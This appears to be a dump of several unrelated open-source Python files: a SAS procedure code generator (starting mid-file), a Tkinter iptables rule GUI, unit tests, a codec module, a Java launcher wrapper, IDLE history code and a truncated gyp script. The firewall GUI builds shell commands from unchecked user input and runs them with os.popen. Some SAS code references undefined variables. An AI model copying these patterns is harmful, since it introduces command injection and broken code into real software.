'.join('{}={}'.format(key, val) for key, val in self._args.items()), dstr) if self.objtype.lower() == 'hpneural' and self._key.casefold() == 'train' and all(k in self._args for k in ("numtries", "maxiter")): return "train numtries={} maxiter={};\n".format(self._args['numtries'], self._args['maxiter']) if self.objtype.lower() == 'nnet' and self._key.casefold() == 'train': return "{0} {1};\n".format(self._key, ' '.join('{}={}'.format(key, val) for key, val in self._args.items())) if self._key.casefold() == 'out' and not len(self.outmeth): return "output out={}.{}\n;".format(self._args.libref, self._args.table) if self._key.casefold() == 'save' and self.objtype == 'treeboost': return '{} %s ;\n'.format(self._key) % ' '.join('{} = {}'.format(key, val) for key, val in self._args.items()) if self._key.casefold() == 'impute': usedVars = [] tup_code = '' contantValues = self._args.pop('value', None) if contantValues is not None: if not all(isinstance(x, tuple) for x in contantValues): raise SyntaxError("The elements in the 'value' key must be tuples") for t in contantValues: tup_code += "impute %s / value = %s;\n" % (t[0], t[1]) usedVars.append(t[0]) meth_code = '' for key, values in self._args.items(): for v in values: meth_code += 'impute %s / method = %s;\n' % (v, key) usedVars.append(v) return '\ninput ' + ' '.join(list(set(usedVars))) + ';\n' + tup_code + meth_code + 'run;' print("KeyError: Proper keys not found for {} dictionary: {}".format(self._key, args)) elif isinstance(self._args, SASdata): key = "{} =".format(self._key) args = "{}.{}".format(self._args.libref, self._args.table) if self._key in ['out','output']: return 'output out={}.{}\n;'.format(self._args.libref, self._args.table) if self._key == 'score': if self.objtype.casefold() == 'hp4score': return "score out={}.{}\n;".format(self._args.libref, self._args.table) elif self.objtype.casefold() == 'tpspline': return "score data={0}.{1} out={2}.{3}\n;".format(self.data.libref, self.data.table, 
self._args.libref, self._args.table) return "score out={}.{}\n;".format(self._args.libref, self._args.table) elif self._key == 'savestate': return "{} rstore = {}.{}\n;".format(key, self._args.libref, self._args.table) elif self._key in ['output', 'out']: if len(self.outmeth): return "{} out = {};\n".format(self._key, args) return "{}.{}".format(self._args.libref, self._args.table) if self._key in ['stmtpassthrough', 'prog_stmts']: return "{0} ;\n".format(args) if self._key =='cls': key = 'class' return "{0} {1};\n".format(key, args) @property def debug(self): if isinstance(self._args, str): return "{0} statement,length: {1},{2}\n".format( self._key, self._args, len(self._args)) elif isinstance(self._args, (list, tuple)): return "list:{}\n".format(self._args) @classmethod def new(cls, key, args): return cls(key, args) class SASProcCommons: def __init__(self, session, *args, **kwargs): # logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.DEBUG) self.logger = logging.getLogger(__name__) self.logger.setLevel(logging.WARN) self.sas = session self.logger.debug("Initialization of SAS Macro: " + self.sas.saslog()) @staticmethod def _errorLog(log): if isinstance(log, str): lines = re.split(r'[\n]\s*', log) i = 0 elog = [] for line in lines: i += 1 e = [] if line.startswith('ERROR'): e = lines[(max(i - 1, 0)):(min(i + 0, len(lines)))] elog = elog + e return "\n".join(elog) else: raise SyntaxError("log is not a string but type:%s" % (str(type(log)))) def _makeProcCallMacro(self, objtype: str, objname: str, data: ['SASdata', str] = None, args: dict = None) -> str: """ This method generates the SAS code from the python objects and included data and arguments. The list of args in this method is largely alphabetical but there are exceptions in order to satisfy the order needs of the statements for the procedure. as an example... 
http://support.sas.com/documentation/cdl/en/statug/68162/HTML/default/viewer.htm#statug_glm_syntax.htm#statug.glm.glmpostable :param objtype: str -- proc name :param objname: str -- 3 digit code for proc :param data: sas dataset object :param args: dict -- proc arguments :return: str -- the SAS code needed to execute on the server """ plot = '' outmeth = '' procopts = args.pop('procopts', '') # Set ODS graphic generation to True by default ODSGraphics = args.get('ODSGraphics', True) # The different SAS products vary slightly in plotting and out methods. # this block sets the options correctly for plotting and output statements if self.sasproduct.lower() == 'stat' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): plot = 'plot=all' if self.sasproduct.lower() == 'qc': pass if self.sasproduct.lower() == 'ets' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): outmeth = 'out' plot = 'plot=all' if self.sasproduct.lower() == 'em': pass if self.sasproduct.lower() == 'vddml': outmeth = 'out' if self.sasproduct.lower() == 'util': outmeth = 'out' if objtype.lower() =='univariate' and not ('ODSGraphics' in args.keys() or ODSGraphics == False): plot = 'plot' outmeth = '' outds = args.pop('out', None) if outds == None: outds = args.pop('output', None) outcodegen = Codegen.new('out', outds) outcodegen.outmeth = outmeth outcodegen.objname = objname outstr = outcodegen.codestmt self.logger.debug("product caller: " + self.sasproduct.lower()) debug_code= '' code = "%macro proccall(d);\n" # resolve issues withe Proc options, out= and plots= # The procopts statement should be in every procedure as a way to pass arbitrary options to the procedures if 'outmeth' in args: outmeth = args['outmeth'] if 'plot' in args: plot = args['plot'] if len(outmeth) and not outds == None: #outstr = outds.libref + '.' 
+ outds.table code += "proc %s data=%s.%s%s %s %s=%s %s ;\n" % ( objtype, data.libref, data.table, data._dsopts(), plot, outmeth, outstr, procopts) else: code += "proc %s data=%s.%s%s %s %s ;\n" % ( objtype, data.libref, data.table, data._dsopts(), plot, procopts) if outds is not None: args['output'] = outds self.logger.debug("args value: " + str(args)) self.logger.debug("args type: " + str(type(args))) # this list is largely alphabetical but there are exceptions in order to # satisfy the order needs of the statements for the procedures # as an example... # http://support.sas.com/documentation/cdl/en/statug/68162/HTML/default/viewer.htm#statug_glm_syntax.htm#statug.glm.glmpostable uoargs = {} orderedargs = {} keyorder = ['by', 'input', 'target', 'cls', 'model', 'output'] for k, v in args.items(): if k in keyorder: orderedargs[k] = v else: uoargs[k] = v orderedargs = OrderedDict(sorted(orderedargs.items(), key=lambda i: keyorder.index(i[0]))) for k, v in uoargs.items(): orderedargs[k] = v orderedargs.move_to_end(k) for key, value in orderedargs.items(): gen = Codegen.new(key, value) gen.objtype = objtype gen.data = data gen.outmeth = outmeth gen.objname = objname code += gen.codestmt if gen.debug is not None: debug_code += gen.debug code += "run; quit; %mend;\n" code += "%%mangobj(%s,%s,%s);" % (objname, objtype, data.table) if self.logger.level == 10: print("Proc code submission:\n " + str(code)) print("\n\n\n" + debug_code) return code def _objectmethods(self, obj: str, *args) -> list: """ This method parses the SAS log for artifacts (tables and graphics) that were created from the procedure method call :param obj: str -- proc object :param args: list likely none :return: list -- the tables and graphs available for tab complete """ code = "%listdata(" code += obj code += ");" self.logger.debug("Object Method macro call: " + str(code)) res = self.sas.submit(code, "text") meth = res['LOG'].splitlines() for i in range(len(meth)): meth[i] = meth[i].lstrip().rstrip() 
self.logger.debug('SAS Log: ' + res['LOG']) objlist = meth[meth.index('startparse9878') + 1:meth.index('endparse9878')] self.logger.debug("PROC attr list: " + str(objlist)) return objlist def _charlist(self, data) -> list: """ Private method to return the variables in a SAS Data set that are of type char :param data: SAS Data object to process :return: list of character variables :rtype: list """ # Get list of character variables to add to nominal list char_string = """ data _null_; file LOG; d = open('{0}.{1}'); nvars = attrn(d, 'NVARS'); put 'VARLIST='; do i = 1 to nvars; vart = vartype(d, i); var = varname(d, i); if vart eq 'C' then put var; end; put 'VARLISTend='; run; """ # ignore teach_me_SAS mode to run contents nosub = self.sas.nosub self.sas.nosub = False ll = self.sas.submit(char_string.format(data.libref, data.table + data._dsopts())) self.sas.nosub = nosub l2 = ll['LOG'].partition("VARLIST=\n") l2 = l2[2].rpartition("VARLISTend=\n") charlist1 = l2[0].split("\n") del charlist1[len(charlist1) - 1] charlist1 = [x.casefold() for x in charlist1] return charlist1 def _processNominals(self, kwargs, data): nom = kwargs.pop('nominals', None) inputs = kwargs.pop('input', None) tgt = kwargs.pop('target', None) targOpts = kwargs.pop('targOpts', None) # get char variables and nominals list if it exists if nom is None: dsnom = SASProcCommons._charlist(self, data) elif isinstance(nom, list): nom = [x.casefold() for x in nom] dsnom = list(set(SASProcCommons._charlist(self, data)) | set(nom)) else: raise SyntaxWarning('nominals must be list type. You gave %s.' 
% str(type(nom))) if tgt is not None: # what object type is target if isinstance(tgt, str): # if there is special character do nothing if len([word for word in tgt if any(letter in word for letter in '/\:;.%')]) != 0: kwargs['target'] = tgt else: # turn str into list and search for nominals tgt_list = tgt.casefold().split() nom_target = list(set(tgt_list).intersection(dsnom)) int_target = list(set(tgt_list).difference(dsnom)) if (nom_target is not None and len(nom_target) > 0) and ( int_target is not None and len(int_target) > 0): kwargs['target'] = {'nominal' : nom_target, 'interval': int_target} elif nom_target is not None and len(nom_target) > 0: kwargs['target'] = {'nominal': nom_target} elif int_target is not None and len(int_target) > 0: kwargs['target'] = {'interval': int_target} elif isinstance(tgt, list): tgt_list = tgt tgt_list = [x.casefold() for x in tgt_list] nom_target = list(set(tgt_list).intersection(dsnom)) int_target = list(set(tgt_list).difference(dsnom)) if (nom_target is not None and len(nom_target) > 0) and ( int_target is not None and len(int_target) > 0): kwargs['target'] = {'nominal' : nom_target, 'interval': int_target} elif nom_target is not None and len(nom_target) > 0: kwargs['target'] = {'nominal': nom_target} elif int_target is not None and len(int_target) > 0: kwargs['target'] = {'interval': int_target} elif isinstance(tgt, dict): # are the keys valid # TODO: make comparison case insensitive casefold() if any(key in tgt.keys() for key in ['nominal', 'interval']): kwargs['target'] = tgt else: raise SyntaxError("Target must be a string, list, or dictionary you provided: %s" % str(type(tgt))) if targOpts is not None: kwargs['target']['targOpts'] = targOpts if inputs is not None: # what object type is input if isinstance(inputs, str): # if there is only one word or special character do nothing if len(inputs.split()) == 1 or len( [word for word in inputs if any(letter in word for letter in '-/\\:;.%')]) != 0: kwargs['input'] = inputs 
else: # turn str into list and search for nominals inputs_list = inputs.casefold().split() nom_input = list(set(inputs_list).intersection(dsnom)) int_input = list(set(inputs_list).difference(dsnom)) if (nom_input is not None and len(nom_input) > 0) and ( int_input is not None and len(int_input) > 0): kwargs['input'] = {'nominal' : nom_input, 'interval': int_input} elif nom_input is not None and len(nom_input) > 0: kwargs['input'] = {'nominal': nom_input} elif int_input is not None and len(int_input) > 0: kwargs['input'] = {'interval': int_input} elif isinstance(inputs, list): inputs_list = inputs inputs_list = [x.casefold() for x in inputs_list] nom_input = list(set(inputs_list).intersection(dsnom)) int_input = list(set(inputs_list).difference(dsnom)) if (nom_input is not None and len(nom_input) > 0) and (int_input is not None and len(int_input) > 0): kwargs['input'] = {'nominal' : nom_input, 'interval': int_input} elif nom_input is not None and len(nom_input) > 0: kwargs['input'] = {'nominal': nom_input} elif int_input is not None and len(int_input) > 0: kwargs['input'] = {'interval': int_input} elif isinstance(inputs, dict): # are the keys valid # TODO: make comparison case insensitive casefold() if any(key in inputs.keys() for key in ['nominal', 'interval']): kwargs['input'] = inputs else: raise SyntaxError("input must be a string, list, or dictionary you provided: %s" % str(type(inputs))) return kwargs def _target_stmt(self, stmt: object) -> tuple: """ takes the target key from kwargs and processes it to aid in the generation of a model statement :param stmt: str, list, or dict that contains the model information. :return: tuple of strings one for the class statement one for the model statements """ # make sure target is a single variable extra split to account for level= option code = '' cls = '' if isinstance(stmt, str): if len(stmt.split('/')[0].split()) == 1: code += "%s" % (stmt) else: raise SyntaxError( "ERROR in code submission. 
TARGET can only have one variable and you submitted: %s" % stmt) elif isinstance(stmt, list): if len(stmt) == 1: code += "%s" % str(stmt[0]) else: raise SyntaxError("The target list must have exactly one member") elif isinstance(stmt, dict): try: # check there there is only one target: length = 0 try: length += len([stmt['nominal'], stmt['interval']]) except KeyError: try: length += len([stmt['nominal']]) except KeyError: try: length += len([stmt['interval']]) except KeyError: raise if length == 1: if 'interval' in stmt.keys(): if isinstance(stmt['interval'], str): code += "%s" % stmt['interval'] if isinstance(stmt['interval'], list): code += "%s" % " ".join(stmt['interval']) if 'nominal' in stmt.keys(): if isinstance(stmt['nominal'], str): code += "%s" % stmt['nominal'] cls += "%s" % stmt['nominal'] if isinstance(stmt['nominal'], list): code += "%s" % " ".join(stmt['nominal']) cls += "%s" % " ".join(stmt['nominal']) else: raise SyntaxError except SyntaxError: print("SyntaxError: TARGET can only have one variable") except KeyError: print("KeyError: Proper keys not found for TARGET dictionary: %s" % stmt.keys()) else: raise SyntaxError("TARGET is in an unknown format: %s" % str(stmt)) return (code, cls) def _input_stmt(self, stmt: object) -> tuple: """ takes the input key from kwargs and processes it to aid in the generation of a model statement :param stmt: str, list, or dict that contains the model information. 
:return: tuple of strings one for the class statement one for the model statements """ code = '' cls = '' if isinstance(stmt, str): code += "%s " % (stmt) elif isinstance(stmt, dict): try: if 'interval' in stmt.keys(): if isinstance(stmt['interval'], str): code += "%s " % stmt['interval'] if isinstance(stmt['interval'], list): code += "%s " % " ".join(stmt['interval']) if 'nominal' in stmt.keys(): if isinstance(stmt['nominal'], str): code += "%s " % stmt['nominal'] cls += "%s " % stmt['nominal'] if isinstance(stmt['nominal'], list): code += "%s " % " ".join(stmt['nominal']) cls += "%s " % " ".join(stmt['nominal']) except: raise SyntaxError("Proper Keys not found for INPUT dictionary: %s" % stmt.keys()) elif isinstance(stmt, list): if len(stmt) == 1: code += "%s" % str(stmt[0]) elif len(stmt) > 1: code += "%s" % " ".join(stmt) else: raise SyntaxError("The input list has no members") else: raise SyntaxError("INPUT is in an unknown format: %s" % str(stmt)) return (code, cls) def _convert_model_to_target(self): target = kwargs['model'].split('=', maxsplit=1)[0].split()[0] input_list = kwargs['model'].split('=', maxsplit=1)[1].split('/')[0].split() if len(kwargs['model'].split('=', maxsplit=1)[1].split('/')[1]) > 0: warnings.warn("\nThe options after the '/' '{}' will be ignored.".format( kwargs['model'].split('=', maxsplit=1)[1].split('/')[1])) if len(kwargs['cls']) > 0: cls = kwargs['cls'].split() inputs = {'nominal' : cls, 'interval': list(set(input_list).difference(cls))} else: inputs = {'intveral': input_list} kwargs['target'] = target kwargs['input'] = inputs return True def _run_proc(self, procname: str, required_set: set, legal_set: set, **kwargs: dict): """ This internal method takes the options and statements from the PROC and generates the code needed to submit it to SAS. It then submits the code. 
:param self: :param procname: str :param required_set: set of options :param legal_set: set of valid options :param kwargs: dict (optional) :return: sas result object """ data = kwargs.pop('data', None) if isinstance(data, str): tempdata = data try: table = tempdata.split('.')[-1] lib = tempdata.split('.')[-2] except IndexError: lib = '' # check that the table exists assert self.sas.exist(table, lib), "The dataset does not exist. Check your spelling and/or libname assignment." data = self.sas.sasdata(table, lib) assert isinstance(data, SASdata), "Data must be a sasdata object. Wrong type or string conversion failed." if required_set is None: required_set = {} objtype = procname.lower() if {'model'}.intersection(required_set) and 'target' in kwargs.keys() and 'model' not in kwargs.keys(): kwargs = SASProcCommons._processNominals(self, kwargs, data) t_str, tcls_str = SASProcCommons._target_stmt(self, kwargs['target']) i_str, icls_str = SASProcCommons._input_stmt(self, kwargs['input']) kwargs['model'] = str(t_str + ' = ' + i_str) if len(icls_str) > 0: kwargs['cls'] = str(tcls_str + " " + icls_str) legal_set.add('cls') drop_target = kwargs.pop('target', None) drop_input = kwargs.pop('input', None) self.logger.debug(drop_target) self.logger.debug(drop_input) elif {'target'}.intersection(required_set) and 'model' in kwargs.keys() and 'target' not in kwargs.keys(): SASProcCommons._convert_model_to_target(self) verifiedKwargs = SASProcCommons._stmt_check(self, required_set, legal_set, kwargs) obj1 = [] nosub = False objname = '' log = '' if len(verifiedKwargs): objname = procname[:3].lower() + self.sas._objcnt() # translate to a libname so needs to be less than 8 code = SASProcCommons._makeProcCallMacro(self, objtype, objname, data, verifiedKwargs) self.logger.debug(procname + " macro submission: " + str(code)) if not self.sas.nosub: ll = self.sas.submit(code, "text") log = ll['LOG'] error = SASProcCommons._errorLog(log) isinstance(error, str) if len(error) > 1: 
RuntimeWarning("ERRORS found in SAS log: \n%s" % error) return SASresults(obj1, self.sas, objname, nosub, log) try: obj1 = SASProcCommons._objectmethods(self, objname) self.logger.debug(obj1) except Exception: pass else: print(code) nosub = True else: RuntimeWarning("Error in code submission") return SASresults(obj1, self.sas, objname, nosub, log) @staticmethod def _stmt_check(self, req: set, legal: set, stmt: dict) -> dict: """ This method checks to make sure that the proc has all required statements and removes any statements aren't valid. Missing required statements is an error. Extra statements are not. :param req: set :param legal: set :param stmt: dict :return: dictionary of verified statements """ # debug the argument list if self.logger.level == 10: for k, v in stmt.items(): print("Key: " + k + ", Value: " + str(v) + ", Type: " + str(type(v))) # required statements reqSet = req if len(reqSet): self.logger.debug("reqSet: {}".format(reqSet)) missing_set = reqSet.difference(set(stmt.keys())) if missing_set: if not stmt.get( 'score'): # till we handle either/or required. proc can be called more than one way w/ diff requirements raise SyntaxError( "You are missing %d required statements:\n%s" % (len(missing_set), str(missing_set))) # legal statements legalSet = legal if len(legalSet): self.logger.debug("legalSet: {}".format(legalSet)) if len(reqSet): totSet = legalSet | reqSet else: totSet = legalSet generalSet = {'ODSGraphics', 'stmtpassthrough', 'targOpts', 'procopts'} extraSet = set(stmt.keys() - generalSet).difference(totSet) # find keys not in legal or required sets if extraSet: self.logger.debug("extraSet: {}".format(extraSet)) for item in extraSet: stmt.pop(item, None) warnings.warn( "The following {} statements are invalid and will be ignored:\n{}".format(len(extraSet), extraSet)) self.logger.debug("stmt: {}".format(stmt)) return stmt
d4rkl0rd3r3b05/Firewall
refs/heads/master
Firewall/apnd.py
1
from Tkinter import * import os class apndwin: def apndwin(self,prntwin): mainwin=Toplevel(master=prntwin) mainwin.resizable(0,0) mainwin.title("Append Rule") #-----------------------------------------This is mainframe-------------------------------------------- mframe=Frame(mainwin) fnt=("FreeSerif",11,"bold") fntopt=("FreeSerif",10) fnttxt=("FreeSerif",12) #------------------------------------------Chain-------------------------------------------------- #chain frame chnfrm=Frame(mframe) #chain label chnlbl=Label(chnfrm,text="Chain"+"\t"*4,font=fnt,relief=FLAT,width=24) chnlbl.pack(side=LEFT,pady=4) #chain options self.chn=StringVar() self.chn.set("INPUT") chnopt = OptionMenu(chnfrm,self.chn,"INPUT","OUTPUT") chnopt["font"]=fntopt chnopt["width"]=18 chnopt.pack() chnfrm.pack(expand=YES,fill=BOTH) #------------------------------------------Action-------------------------------------------------- #Action frame actfrm=Frame(mframe) #Action label actlbl=Label(actfrm,text="Action"+"\t"*4,font=fnt,relief=FLAT,width=24) actlbl.pack(side=LEFT,pady=4) #Action option self.act=StringVar() self.act.set("REJECT") actopt = OptionMenu(actfrm,self.act,"REJECT", "DROP", "LOG","ACCEPT","RETURN") actopt["font"]=fntopt actopt["width"]=18 actopt.pack() actfrm.pack(expand=YES,fill=BOTH) #--------------------------------------Protocol------------------------------------------------------ #Protocol frame protofrm=Frame(mframe) #protocol label protolbl=Label(protofrm,text="Protocol"+"\t"*4,font=fnt,relief=FLAT,width=24) protolbl.pack(side=LEFT,pady=4) #protocol option self.proto=StringVar() self.proto.set("tcp") protoopt = OptionMenu(protofrm,self.proto,"TCP", "UDP","SCTP", "ICMP","UDPLITE","ESP","AH","ALL") protoopt["font"]=fntopt protoopt["width"]=18 protoopt.pack() protofrm.pack(expand=YES,fill=X) #-----------------------------------------source address----------------------------------------------- #source address frame srcaddfrm=Frame(mframe) self.srcadd=StringVar() #source address 
label srcaddlbl=Label(srcaddfrm,text="Source Address"+"\t"*3,font=fnt,relief=FLAT,width=24) srcaddlbl.pack(side=LEFT,pady=4) #source address text srcaddtxt=Entry(srcaddfrm,textvariable=self.srcadd,font=fnttxt,relief=SUNKEN) srcaddtxt.pack(side=LEFT,pady=4) srcaddfrm.pack(expand=YES,fill=X) #-----------------------------------------source port----------------------------------------------- #source port frame srcprtfrm=Frame(mframe) self.srcprt=StringVar() #source port label srcprtlbl=Label(srcprtfrm,text="Source Port"+"\t"*3,font=fnt,relief=FLAT,width=24) srcprtlbl.pack(side=LEFT,pady=4) #source port text srcprttxt=Entry(srcprtfrm,textvariable=self.srcprt,font=fnttxt,relief=SUNKEN) srcprttxt.pack(side=LEFT,pady=4) srcprtfrm.pack(expand=YES,fill=X) #-----------------------------------------destination address----------------------------------------------- #destination address frame desaddfrm=Frame(mframe) self.desadd=StringVar() #destination address label desaddlbl=Label(desaddfrm,text="Destination Address"+"\t"*2,font=fnt,relief=FLAT,width=24) desaddlbl.pack(side=LEFT,pady=4) #desination address text desaddtxt=Entry(desaddfrm,textvariable=self.desadd,font=fnttxt,relief=SUNKEN) desaddtxt.pack(side=LEFT,pady=4) desaddfrm.pack(expand=YES,fill=X) #-----------------------------------------destination port----------------------------------------------- #destination port frame desprtfrm=Frame(mframe) self.desprt=StringVar() #desination port label desprtlbl=Label(desprtfrm,text="Destination Port"+"\t"*3,font=fnt,relief=FLAT,width=24) desprtlbl.pack(side=LEFT,pady=4) #desination port text desprttxt=Entry(desprtfrm,textvariable=self.desprt,font=fnttxt,relief=SUNKEN) desprttxt.pack(side=LEFT,pady=4) desprtfrm.pack(expand=YES,fill=X) #---------------------------------------------Append button-------------------------------------------------- addbtn=Button(mframe,text="Append Rule",command=self.apnd,\ font=fnt,relief=RAISED,width=18,height=1) 
addbtn.pack(side=TOP,anchor=CENTER,pady=4) mframe.pack(expand=YES,fill=BOTH) mainwin.mainloop() def apnd(self): chain='iptables -A '+self.chn.get() action=' -j '+self.act.get() #-------------------------------------------------------------------- if(self.chn.get()=="INPUT"): if(self.srcadd.get()!=""): addrs=' -s '+self.srcadd.get() else: addrs=' -s 0/0' else: if(self.desadd.get()!=""): addrs=' -d '+self.desadd.get() else: addrs=' -d 0/0' #--------------------------------------------------------------------- if(self.proto!=""): prtcl=' -p '+self.proto.get() else: prtcl="" #--------------------------------------------------------------------- if(self.srcprt.get()!=""): sprt=' --sport '+self.srcprt.get() else: sprt="" #--------------------------------------------------------------------- if(self.desprt.get()!=""): dprt=' --dport '+self.desprt.get() else: dprt="" try: os.popen(chain+prtcl+addrs+sprt+dprt+action,"r") except: pass apndobj=apndwin() def apndwn(mnwin): apndobj.apndwin(mnwin)
msiedlarek/wiring
refs/heads/master
tests/all/__init__.py
1
import unittest import importlib import six class ModuleTest(unittest.TestCase): module = 'wiring' def test_import_all(self): package = importlib.import_module(self.module) if not hasattr(package, '__all__'): return for name in package.__all__: self.assertTrue( hasattr(package, name), msg=( "Module `{module}` is missing `{name}` which was declared" " in `__all__`." ).format( module=self.module, name=name ) ) class InitTest(unittest.TestCase): imported_modules = ( 'wiring.configuration', 'wiring.dependency', 'wiring.graph', 'wiring.interface', 'wiring.providers', 'wiring.scopes', ) def test_imports(self): import wiring for module in self.imported_modules: package = importlib.import_module(module) if not hasattr(package, '__all__'): continue for name in package.__all__: self.assertTrue( hasattr(wiring, name), msg=( "Module `wiring` is missing `{name}` which should be" " wildcard-imported from `{module}`." ).format( name=name, module=module ) ) def test_metadata(self): import wiring self.assertIsInstance(wiring.__title__, six.string_types) self.assertRegexpMatches(wiring.__title__, r'^\w+$') self.assertIsInstance(wiring.__version__, six.string_types) self.assertRegexpMatches(wiring.__version__, r'^\d+\.\d+\.\d+$')
edx/lettuce
refs/heads/master
tests/integration/django/cucumber/second/features/step_definitions/second.py
19
# -*- coding: utf-8 -*- from lettuce import step @step(u'Given this app is the second app') def given_this_app_is_the_second_app(step): pass
cadyyan/codeeval
refs/heads/master
python/18_multiples_of_a_number.py
2
#!/usr/bin/env python import sys with open(sys.argv[1], 'r') as fh: for line in fh.readlines(): line = line.strip() if line == '': continue (x, n) = [int(v) for v in line.split(',')] v = n while v < x: v += n print v
vlachoudis/sl4a
refs/heads/master
python/src/Lib/encodings/iso2022_jp_3.py
816
# # iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3 # # Written by Hye-Shik Chang <perky@FreeBSD.org> # import _codecs_iso2022, codecs import _multibytecodec as mbc codec = _codecs_iso2022.getcodec('iso2022_jp_3') class Codec(codecs.Codec): encode = codec.encode decode = codec.decode class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, codecs.IncrementalEncoder): codec = codec class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, codecs.IncrementalDecoder): codec = codec class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader): codec = codec class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter): codec = codec def getregentry(): return codecs.CodecInfo( name='iso2022_jp_3', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter, )
johnnyliu27/openmc
refs/heads/develop
tests/regression_tests/lattice_hex/test.py
11
from tests.testing_harness import TestHarness def test_lattice_hex(): harness = TestHarness('statepoint.10.h5') harness.main()
jfallmann/bioconda-recipes
refs/heads/master
recipes/ega2/ega2.py
22
#!/usr/bin/env python # # Wrapper script for Java Conda packages that ensures that the java runtime # is invoked with the right options. Adapted from the bash script (http://stackoverflow.com/questions/59895/can-a-bash-script-tell-what-directory-its-stored-in/246128#246128). # # Program Parameters # import os import subprocess import sys import shutil from os import access from os import getenv from os import X_OK jar_file = 'EgaDemoClient.jar' default_jvm_mem_opts = ['-Xms512m', '-Xmx1g'] # !!! End of parameter section. No user-serviceable code below this line !!! def real_dirname(path): """Return the symlink-resolved, canonicalized directory-portion of path.""" return os.path.dirname(os.path.realpath(path)) def java_executable(): """Return the executable name of the Java interpreter.""" java_home = getenv('JAVA_HOME') java_bin = os.path.join('bin', 'java') if java_home and access(os.path.join(java_home, java_bin), X_OK): return os.path.join(java_home, java_bin) else: return 'java' def jvm_opts(argv): """Construct list of Java arguments based on our argument list. The argument list passed in argv must not include the script name. 
The return value is a 3-tuple lists of strings of the form: (memory_options, prop_options, passthrough_options) """ mem_opts = [] prop_opts = [] pass_args = [] exec_dir = None for arg in argv: if arg.startswith('-D'): prop_opts.append(arg) elif arg.startswith('-XX'): prop_opts.append(arg) elif arg.startswith('-Xm'): mem_opts.append(arg) elif arg.startswith('--exec_dir='): exec_dir = arg.split('=')[1].strip('"').strip("'") if not os.path.exists(exec_dir): shutil.copytree(real_dirname(sys.argv[0]), exec_dir, symlinks=False, ignore=None) else: pass_args.append(arg) # In the original shell script the test coded below read: # if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ] # To reproduce the behaviour of the above shell code fragment # it is important to explictly check for equality with None # in the second condition, so a null envar value counts as True! if mem_opts == [] and getenv('_JAVA_OPTIONS') is None: mem_opts = default_jvm_mem_opts return (mem_opts, prop_opts, pass_args, exec_dir) def main(): java = java_executable() """ PeptideShaker updates files relative to the path of the jar file. In a multiuser setting, the option --exec_dir="exec_dir" can be used as the location for the peptide-shaker distribution. If the exec_dir dies not exist, we copy the jar file, lib, and resources to the exec_dir directory. """ (mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:]) jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0]) if pass_args != [] and pass_args[0].startswith('eu'): jar_arg = '-cp' else: jar_arg = '-jar' jar_path = os.path.join(jar_dir, jar_file) java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args sys.exit(subprocess.call(java_args)) if __name__ == '__main__': main()
trivoldus28/pulsarch-verilog
refs/heads/master
tools/local/bas-release/bas,3.9/lib/python/lib/python2.3/idlelib/IdleHistory.py
11
class History: def __init__(self, text, output_sep = "\n"): self.text = text self.history = [] self.history_prefix = None self.history_pointer = None self.output_sep = output_sep text.bind("<<history-previous>>", self.history_prev) text.bind("<<history-next>>", self.history_next) def history_next(self, event): self.history_do(0) return "break" def history_prev(self, event): self.history_do(1) return "break" def _get_source(self, start, end): # Get source code from start index to end index. Lines in the # text control may be separated by sys.ps2 . lines = self.text.get(start, end).split(self.output_sep) return "\n".join(lines) def _put_source(self, where, source): output = self.output_sep.join(source.split("\n")) self.text.insert(where, output) def history_do(self, reverse): nhist = len(self.history) pointer = self.history_pointer prefix = self.history_prefix if pointer is not None and prefix is not None: if self.text.compare("insert", "!=", "end-1c") or \ self._get_source("iomark", "end-1c") != self.history[pointer]: pointer = prefix = None if pointer is None or prefix is None: prefix = self._get_source("iomark", "end-1c") if reverse: pointer = nhist else: pointer = -1 nprefix = len(prefix) while 1: if reverse: pointer = pointer - 1 else: pointer = pointer + 1 if pointer < 0 or pointer >= nhist: self.text.bell() if self._get_source("iomark", "end-1c") != prefix: self.text.delete("iomark", "end-1c") self._put_source("iomark", prefix) pointer = prefix = None break item = self.history[pointer] if item[:nprefix] == prefix and len(item) > nprefix: self.text.delete("iomark", "end-1c") self._put_source("iomark", item) break self.text.mark_set("insert", "end-1c") self.text.see("insert") self.text.tag_remove("sel", "1.0", "end") self.history_pointer = pointer self.history_prefix = prefix def history_store(self, source): source = source.strip() if len(source) > 2: # avoid duplicates try: self.history.remove(source) except ValueError: pass self.history.append(source) 
self.history_pointer = None self.history_prefix = None def recall(self, s): s = s.strip() self.text.tag_remove("sel", "1.0", "end") self.text.delete("iomark", "end-1c") self.text.mark_set("insert", "end-1c") self.text.insert("insert", s) self.text.see("insert")
SaschaMester/delicium
refs/heads/master
tools/gyp-explain.py
153
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Prints paths between gyp targets. """ import json import os import sys import time from collections import deque def usage(): print """\ Usage: tools/gyp-explain.py [--dot] chrome_dll# gtest# """ def GetPath(graph, fro, to): """Given a graph in (node -> list of successor nodes) dictionary format, yields all paths from |fro| to |to|, starting with the shortest.""" # Storing full paths in the queue is a bit wasteful, but good enough for this. q = deque([(fro, [])]) while q: t, path = q.popleft() if t == to: yield path + [t] for d in graph[t]: q.append((d, path + [t])) def MatchNode(graph, substring): """Given a dictionary, returns the key that matches |substring| best. Exits if there's not one single best match.""" candidates = [] for target in graph: if substring in target: candidates.append(target) if not candidates: print 'No targets match "%s"' % substring sys.exit(1) if len(candidates) > 1: print 'More than one target matches "%s": %s' % ( substring, ' '.join(candidates)) sys.exit(1) return candidates[0] def EscapeForDot(string): suffix = '#target' if string.endswith(suffix): string = string[:-len(suffix)] string = string.replace('\\', '\\\\') return '"' + string + '"' def GenerateDot(fro, to, paths): 